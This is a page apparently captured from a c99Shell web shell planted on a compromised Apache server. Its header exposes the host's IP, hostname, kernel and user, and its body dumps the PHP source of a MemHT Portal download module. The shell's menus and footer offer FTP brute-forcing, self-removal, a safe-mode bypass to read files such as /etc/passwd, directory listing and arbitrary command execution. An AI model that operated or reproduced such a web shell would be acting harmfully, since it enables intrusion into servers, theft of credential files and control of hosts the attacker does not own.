110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/alumni/pages/download/ drwxr-xr-x Free 40.49 GB of 127.8 GB (31.68%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php



/********************************************************************************

    - MemHT Portal -

    

    Copyright (C) 2007-2008 by Miltenovik Manojlo

    http://www.memht.com

    

    This program is free software; you can redistribute it and/or modify

    it under the terms of the GNU General Public License as published by

    the Free Software Foundation; either version 2 of the License, or

    (at your opinion) any later version.

    

    This program is distributed in the hope that it will be useful,

    but WITHOUT ANY WARRANTY; without even the implied warranty of

    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

    GNU General Public License for more details.

    

    You should have received a copy of the GNU General Public License along

    with this program; if not, see <http://www.gnu.org/licenses/> (GPLv2)

    or write to the Free Software Foundation, Inc., 51 Franklin Street,

    Fifth Floor, Boston, MA02110-1301, USA.

        

********************************************************************************/



if (!defined("_LOAD_PAGE_")) {

    die("<table style='padding: 2px; border: 1px solid #999; background-color: #EEE; font-family: Verdana; font-size: 10px;' align='center'><tr><td><b>Error:</b> This file cannot be opened directly!</td></tr></table>");

}



//------

//whr: 4

//------



$op = (isset($_GET['op'])) ? inCode($_GET['op']) : "" ;

$id = (isset($_GET['id'])) ? intval($_GET['id']) : 0 ;

$title = (isset($_GET['title'])) ? mem_urldecode(inCode($_GET['title'])) : "" ;

$dw = (isset($_POST['dw'])) ? inCode($_POST['dw']) : "" ;

$rank = (isset($_GET['rank'])) ? intval($_GET['rank']) : 1 ;

$fileid = (isset($_GET['fileid'])) ? inCode($_GET['fileid']) : 0 ;

$ok = (isset($_GET['ok'])) ? inCode($_GET['ok']) : false ;

$pg = (isset($_GET['pg'])) ? intval($_GET['pg']) : 1 ;

$ofsppg = 20; //Items per page

$ofsbgn = ($pg*$ofsppg)-$ofsppg;



function catList($ofsbgn,$ofsppg,$pg) {

    global $dblink,$siteConfig,$tzNOW;

    

    if ($result = $dblink->get_list("SELECT * FROM memht_download_categorie WHERE parent=0 ORDER BY nome")) {

        foreach ($result as $row) {

            $cid = intval($row['id']);

            $cparent = intval($row['parent']);

            $cname = outCode($row['nome']);

            $cdesc = outCode($row['descrizione']);

            

            //Show subcategories

            openTable("<a href='index.php?page=download&op=category&id=$cid&title=".mem_urlencode($cname)."' title='$cname'>$cname</a>");

                echo "<table width='100%' border='0' cellspacing='0' cellpadding='2'>\n";

                    if ($cdesc!="") { echo "<tr><td colspan='2' class='box'>$cdesc</td></tr>\n"; }

                    $a = 0;

                    $sresult = $dblink->get_list("SELECT * FROM memht_download_categorie WHERE parent=$cid ORDER BY nome");

                    foreach ($sresult as $srow) {

                        $sid = intval($srow['id']);

                        $sname = outCode($srow['nome']);

                        

                        $sfiles = "<span class='info'>(".$dblink->get_num("SELECT id FROM memht_download WHERE cat='$sid'").")</span>";

                            

                        if (($a%2)==0) { echo "<tr>"; }

                        echo "<td width='50%' valign='top'><img src='images/bullet_paper.gif' border='0' alt='Bullet'> <a href='index.php?page=download&op=category&id=$sid&title=".mem_urlencode($sname)."' title='$sname'><b>$sname</b></a> $sfiles</td>";

                        if (($a++%2)!=0) { echo "</tr>\n"; }

                    }

                echo "</table>\n";

                

                //Show files

                if ($fresult = $dblink->get_list("SELECT *,DATE_FORMAT(data, '".$siteConfig['timestamp']."') as data FROM memht_download WHERE cat=$cid AND enabled=1 ORDER BY id DESC LIMIT $ofsbgn,$ofsppg")) {

                    echo "<table width='100%' border='0' cellspacing='0' cellpadding='2' style='margin-top:5px;'>\n";

                    $a = 0;

                    foreach ($fresult as $frow) {

                        $fid = intval($frow['id']);

                        $fname = outCode($frow['nome']);

                        $fauthor = outCode($frow['autore']);

                        $fversion = outCode($frow['version']);

                        $fdate = outCode($frow['data']);

                        $fsize = strSize(intval($frow['dimensione']));

                        $fdownloaded = intval($frow['scaricato']);

                        $permission = intval($frow['flag']);

                        $group = intval($frow['pgroup']);

                        

                        if ($fversion=="") { $fversion = "-"; }

                        $row = $dblink->get_row("SELECT name FROM memht_groups WHERE id=$group");

                        $gname = outCode($row['name']);

                        switch ($permission) {

                             case 0: $fpermission = _PUBLIC_; break;

                             case 1: $fpermission = _REGISTERED_; break;

                             case 2: $fpermission = _GROUP_." ($gname)"; break;

                        }

                        

                        $info = "";

                        if ($fdownloaded>=200) { $info .= " <img src='images/pop.gif' title='"._POP_."' border='0' alt='Pop'>"; } //Pop 200 downloads

                        if ($dblink->get_num("SELECT id FROM memht_download WHERE id=$fid AND (data + INTERVAL 7 DAY) > $tzNOW")>0) {

                            $info .= " <img src='images/new.gif' title='"._NEW_."' border='0' alt='New'>"; //New 7 days

                        }

                        

                        if (($a%2)==0) { echo "<tr>\n"; }

                        

                            echo "<td width='50%' valign='top'>\n";

                                echo "<div class='box' style='padding:2px; margin:0;'>\n";

                                    echo "<div><img src='images/download.gif' border='0' alt='"._DOWNLOAD_."'> <a href='index.php?page=download&op=getFile&id=$fid&title=".mem_urlencode($fname)."' title='$fname'><b><span class='tpl_comments_title'>$fname</span></b></a>$info</div>\n";

                                    echo "<div style='padding:2px;'></div>\n";

                                    echo "<div><b>"._AUTHOR_.":</b> $fauthor</div>\n";

                                    echo "<div><b>"._VERSION_.":</b> $fversion</div>\n";

                                    echo "<div><b>"._DATE_.":</b> $fdate</div>\n";

                                    echo "<div><b>"._SIZE_.":</b> $fsize</div>\n";

                                    echo "<div><b>"._DOWNLOADED_.":</b> $fdownloaded "._TIMES_."</div>\n";

                                    echo "<div><b>"._PERMISSION_.":</b> $fpermission</div>\n";

                                echo "</div>\n";

                            echo "</td>\n";

                        if (($a++%2)!=0) { echo "</tr>\n"; }

                    }

                    echo "</table>\n";

                    

                    //Pages

                    include_once("inc/class/paginationSystem.class.php");

                    $ps = new paginationSystem();

                    $ps->items = $ofsppg;

                    $ps->actpg = $pg;

                    $ps->query = "SELECT id FROM memht_download WHERE cat=$cid";

                    $ps->url = "index.php?page=download&op=category&id=$cid&title=".mem_urlencode($cname)."&pg={{N}}";

                    $ps->show();

                }

            closeTable();

            echo "<br>\n";

        }

    } else {

        openTable();

        echo "<div align='center' id='errorText' class='box'><b>"._EMPTY_."</b></div>";

        closeTable();

    }

}



function showCategory($id,$title,$ofsbgn,$ofsppg,$pg) {

    global $dblink,$siteConfig,$tzNOW;

    

    $id = intval($id);

    

    if ($row = $dblink->get_row("SELECT * FROM memht_download_categorie WHERE id=$id")) {

        $cid = intval($row['id']);

        $cparent = intval($row['parent']);

        $cname = outCode($row['nome']);

        $cdesc = outCode($row['descrizione']);

            

        //Show subcategories

        openTable("<a href='index.php?page=download&op=category&id=$cid&title=".mem_urlencode($cname)."' title='$cname'>$cname</a>");

            if ($cdesc!="") { echo "<div class='box' style='border-style:dashed;'>$cdesc</div>\n"; }

            if ($sresult = $dblink->get_list("SELECT * FROM memht_download_categorie WHERE parent=$cid ORDER BY nome")) {

                echo "<table width='100%' border='0' cellspacing='0' cellpadding='2'>\n";

                $a = 0;

                foreach ($sresult as $srow) {

                    $sid = intval($srow['id']);

                    $sname = outCode($srow['nome']);

                    

                    $sfiles = "<span class='info'>(".$dblink->get_num("SELECT id FROM memht_download WHERE cat='$sid'").")</span>";

                        

                    if (($a%2)==0) { echo "<tr>"; }

                    echo "<td width='50%' valign='top'><img src='images/bullet_paper.gif' border='0' alt='Bullet'> <a href='index.php?page=download&op=category&id=$sid&title=".mem_urlencode($sname)."' title='$sname'><b>$sname</b></a> $sfiles</td>";

                    if (($a++%2)!=0) { echo "</tr>\n"; }

                }

                echo "</table>\n";

                echo "<br>";

            }

        

        //Show files

        if ($fresult = $dblink->get_list("SELECT *,DATE_FORMAT(data, '".$siteConfig['timestamp']."') as data FROM memht_download WHERE cat=$id AND enabled=1 ORDER BY id DESC LIMIT $ofsbgn,$ofsppg")) {

            echo "<table width='100%' border='0' cellspacing='0' cellpadding='2'>\n";

            $a = 0;

            foreach ($fresult as $frow) {

                $fid = intval($frow['id']);

                $fname = outCode($frow['nome']);

                $fauthor = outCode($frow['autore']);

                $fversion = outCode($frow['version']);

                $fdate = outCode($frow['data']);

                $fsize = strSize(intval($frow['dimensione']));

                $fdownloaded = intval($frow['scaricato']);

                $permission = intval($frow['flag']);

                $group = intval($frow['pgroup']);

                

                if ($fversion=="") { $fversion = "-"; }

                $row = $dblink->get_row("SELECT name FROM memht_groups WHERE id=$group");

                $gname = outCode($row['name']);

                switch ($permission) {

                     case 0: $fpermission = _PUBLIC_; break;

                     case 1: $fpermission = _REGISTERED_; break;

                     case 2: $fpermission = _GROUP_." ($gname)"; break;

                }

                

                $info = "";

                if ($fdownloaded>=200) { $info .= " <img src='images/pop.gif' title='"._POP_."' border='0' alt='Pop'>"; } //Pop 200 downloads

                if ($dblink->get_num("SELECT id FROM memht_download WHERE id=$fid AND (data + INTERVAL 7 DAY) > $tzNOW")>0) {

                    $info .= " <img src='images/new.gif' title='"._NEW_."' border='0' alt='New'>"; //New 7 days

                }

                

                if (($a%2)==0) { echo "<tr>\n"; }

                

                    echo "<td width='50%' valign='top'>\n";

                        echo "<div class='box' style='padding:2px; margin:0;'>\n";

                            echo "<div><img src='images/download.gif' border='0' alt='"._DOWNLOAD_."'> <a href='index.php?page=download&op=getFile&id=$fid&title=".mem_urlencode($fname)."' title='$fname'><b><span class='tpl_comments_title'>$fname</span></b></a>$info</div>\n";

                            echo "<div style='padding:2px;'></div>\n";

                            echo "<div><b>"._AUTHOR_.":</b> $fauthor</div>\n";

                            echo "<div><b>"._VERSION_.":</b> $fversion</div>\n";

                            echo "<div><b>"._DATE_.":</b> $fdate</div>\n";

                            echo "<div><b>"._SIZE_.":</b> $fsize</div>\n";

                            echo "<div><b>"._DOWNLOADED_.":</b> $fdownloaded "._TIMES_."</div>\n";

                            echo "<div><b>"._PERMISSION_.":</b> $fpermission</div>\n";

                        echo "</div>\n";

                    echo "</td>\n";

                if (($a++%2)!=0) { echo "</tr>\n"; }

            }

            echo "</table>\n";

            

            //Pages

            include_once("inc/class/paginationSystem.class.php");

            $ps = new paginationSystem();

            $ps->items = $ofsppg;

            $ps->actpg = $pg;

            $ps->query = "SELECT id FROM memht_download WHERE cat=$id";

            $ps->url = "index.php?page=download&op=category&id=$id&title=".mem_urlencode($title)."&pg={{N}}";

            $ps->show();

        }

        closeTable();

    } else {

        openTable();

        echo "<div align='center' id='errorText' class='box'><b>"._EMPTY_."</b></div>";

        closeTable();

    }

}



function getD($id,$title,$dw) {

    global $dblink,$userid,$userInfo,$siteConfig,$visitorInfo;

    $fid = intval($id);

    

    if ($fid>0 OR $title!="") {

        if (!$dw) {

            if ($row = $dblink->get_row("SELECT *,DATE_FORMAT(d.data, '".$siteConfig['timestamp']."') as data,(SELECT ROUND(SUM(vote)/COUNT(id)) AS irank FROM memht_ratings WHERE whr=4 AND wid=d.id) AS rank FROM memht_download AS d WHERE (d.id=$fid OR d.nome='$title') AND enabled=1")) {

                $dblink->query("UPDATE memht_download SET visto=visto+1 WHERE id=$fid OR nome='$title'");

                $fid = intval($row['id']);

                $fnome = outCode($row['nome']);

                $furl = outCode($row['url']);

                $fdescrizione = outCode($row['descrizione']);

                $fdemolink = outCode($row['demolink']);

                $fversion = outCode($row['version']);

                $fautore = outCode($row['autore']);

                $fdata = $row['data'];

                $fdimensione = intval($row['dimensione']);

                $fvisto = intval($row['visto']);

                $fscaricato = intval($row['scaricato']);

                $flag = intval($row['flag']); //0 = public, 1 = registered, 2 = group

                $group = intval($row['pgroup']);

                $rank = intval($row['rank']);

                $usecomments = intval($row['usecomments']);

                

                if (memRunHooks('ViewFile',array($id,$fnome,$furl,$fdescrizione,$fdemolink,$fversion,$fautore,$fdata,$fdimensione,$fvisto,$fscaricato,$flag,$group,$rank))) {

                    openTable($fnome);

                        echo "<form name='form1' method='post' action='index.php?page=download&op=getFile&id=$fid&title=".mem_urlencode($fnome)."'>\n";

                        echo "<table width='100%' border='0' cellspacing='0' cellpadding='2'>\n";



                        if ($fdescrizione!="") { echo "<tr><td colspan='2' class='box'>$fdescrizione</td></tr>\n"; }

                        echo "<tr><th width='25%'>"._AUTHOR_.":</th><td>$fautore</td></tr>\n";

                        if ($fdemolink!="") { echo "<tr><th>"._DEMO_.":</th><td><a href='$fdemolink' target='_blank' rel='nofollow'>$fdemolink</a></td></tr>\n"; }

                        if ($fversion!="") { echo "<tr><th valign='top'>"._VERSION_."</th><td>$fversion</td></tr>\n"; }

                        echo "<tr><th>"._DATE_.":</th><td>$fdata</td></tr>\n";

                        if ($fdimensione) { echo "<tr><th>"._DIMENSION_.":</th><td>".strSize($fdimensione)."</td></tr>\n"; }

                        echo "<tr><th>"._VIEWED_.":</th><td>$fvisto "._TIMES_."</td></tr>\n";

                        echo "<tr><th>"._DOWNLOADED_.":</th><td>$fscaricato "._TIMES_."</td></tr>\n";

                        

                        if (isAuth($userid,3) OR $flag==0 OR ($flag==1 AND isUser($userid)) OR ($flag==2 AND $dblink->get_num("SELECT * FROM memht_groups AS gr JOIN memht_groups_members AS gm ON gr.id=gm.groupid WHERE gr.id=$group AND gm.user='".$userInfo['user']."'")>0)) {

                            if (extension_loaded('gd') AND $siteConfig['graphic_check']) {

                                echo "<tr><td></td><td><img src='".$siteConfig['site_url']."/imgCode.php?name=chk_download&nc=".md5(time()+rand())."' title='header=["._SECURITY_CODE_."] body=["._SECURITY_CODE_TEXT_."]' alt='Captcha'></td></tr>\n";

                                echo "<tr><th valign='bottom'>"._CODE_."</th><td><input type='text' name='post_code_page' size='10' maxlength='255'> <input type='submit' name='Submit' value='"._DOWNLOAD_."'></td></tr>\n";

                            } else {

                                echo "<tr><td colspan='2' align='center'><input type='submit' name='Submit' value='"._DOWNLOAD_."'></td></tr>\n";

                            }

                            echo "</table>\n";

                            echo "<input type='hidden' name='dw' value=true>\n";

                            echo "</form>\n";

                                                

                            echo "<div style='padding:10px;'></div>\n";

                            

                            //Rating

                            include_once("inc/class/rating.class.php");

                            $rt = new rating();

                            $rt->whr = 4;

                            $rt->wid = $id;

                            $rt->rank = $rank;

                            $rt->show();

                            

                            //Tags

                            include_once("inc/class/tags.class.php");

                            $tg = new tags();

                            $tg->whr = 4;

                            $tg->wid = $fid;

                            $tg->show();

                        closeTable();

                            

                        if ($siteConfig['usecomments']==1 AND $usecomments==1) {

                            openTable();

                                //Comments

                                include_once("inc/class/comments.class.php");

                                $cc = new comments();

                                $cc->whr = 4;

                                $cc->wid = $fid;

                                $cc->show();

                            closeTable();

                        }

                    } else {

                        echo "</form></table>\n";

                        

                        switch ($flag) {

                            case 1:

                                echo "<div align='center' class='box'><b>"._DOTHE_." <a href='index.php?page=users' title='"._LOGIN_."'>"._LOGIN_."</a> "._OR_." <a href='index.php?page=users&op=register' title='"._REGISTER_."'>"._REGISTER_."</a> "._TODOWNLOADFILE_."</b></div>\n";

                            break;

                            case 2:

                                $row = $dblink->get_row("SELECT name,type,amount FROM memht_groups WHERE id=$group");

                                $name = outCode($row['name']);

                                $type = intval($row['type']);

                                $amount = intval($row['amount']);

                                echo "<div align='center' class='box'><b>"._YOUHAVENOPERM_." "._TODOWNLOADFILE_."</b></div>";

                                echo "<div class='box'><b>"._GROUP_.":</b> $name";

                                if ($type>0) {

                                    echo "<br><b>"._REQUIRED_.":</b> ";

                                    switch ($type) {

                                        case 1: echo "$amount "._FORUM_POSTS_; break;

                                        case 2: echo "$amount "._CONTRIBUTES_." ("._NEWS_.","._FILES_.")"; break;

                                    }

                                }

                                echo "</div>";

                            break;

                        }

                        closeTable();

                    }

                    memRunHooks('ViewFileEnd',array($id,$fnome,$furl,$fdescrizione,$fdemolink,$fversion,$fautore,$fdata,$fdimensione,$fvisto,$fscaricato,$flag,$group,$rank));

                }

            } else {

                openTable();

                    echo "<div align='center' id='errorText' class='box'><b>"._FILEDONOTEXIST_."</b></div>";

                closeTable();

            }

        } else {

            @session_start();

            if ((isset($_POST['post_code_page']) AND isset($_SESSION['chk_download']) AND strtolower($_POST['post_code_page'])==strtolower($_SESSION['chk_download'])) OR !(extension_loaded('gd') AND $siteConfig['graphic_check'])) {

                $dblink->query("UPDATE memht_download SET scaricato=scaricato+1 WHERE id='$fid' OR nome='$title'");

                

                $row = $dblink->get_row("SELECT * FROM memht_download WHERE id='$fid' OR nome='$title'");

                $fnome = outCode($row['nome']);

                $furl = outCode($row['url']);

                openTable();

                    echo "<div align='center'>"._YOURDOWNLOADINGTHEFILE_." <b>$fnome</b></div>";

                closeTable();

                echo "<meta http-equiv='refresh' content='5;URL=$furl'>";

            } else {

                openTable();

                    echo "<div align='center' id='errorText'><b>"._WRONGSECCODE_."</b></div>";

                closeTable();

            }

        }

    } else {

        echo "<meta http-equiv='refresh' content='0;URL=".$siteConfig['site_url']."/index.php?page=download'>";

    }

}



    switch($op) {

        case "getFile":

            getD($id,$title,$dw);

        break;

        

        case "showCategory":

            header("Location: index.php?page=download&op=category&id=$id");

        break;



        case "viewFiles":

            header("Location: index.php?page=download&op=category&id=$id");

        break;

        

        case "category":

            showCategory($id,$title,$ofsbgn,$ofsppg,$pg);

        break;

        

        case "catList":

        default:

            catList($ofsbgn,$ofsppg,$pg);

        break;

    }



?>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: